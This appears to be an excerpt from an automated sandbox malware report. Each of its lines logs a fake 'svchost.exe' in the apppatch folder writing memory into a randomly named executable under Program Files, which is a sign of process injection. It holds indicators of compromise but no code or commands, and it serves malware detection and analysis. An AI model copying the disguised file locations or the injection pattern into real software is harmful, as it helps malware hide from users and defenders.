Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2915000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2530000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2531000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2532000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2585000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2AA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2AA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2AF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3130000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3131000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3132000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3185000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2630000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2631000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2632000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2685000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A15000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2815000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2845000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: B20000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: B21000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: B22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: B75000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2935000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 8A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 8A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 8A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 8F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2820000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2821000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2822000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2875000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: CE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2730000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2731000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2732000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2785000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2120000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2121000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2122000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2175000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2605000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2330000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2331000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2332000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2385000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2225000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2850000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2851000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2852000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28A5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2C35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F30000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F31000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F32000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F85000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2B70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2B71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2B72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BC5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2480000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2481000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2482000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 24D5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2C35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F65000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 530000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 531000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 532000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 585000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F40000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F41000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F95000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2605000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27D2000Jump to behavior
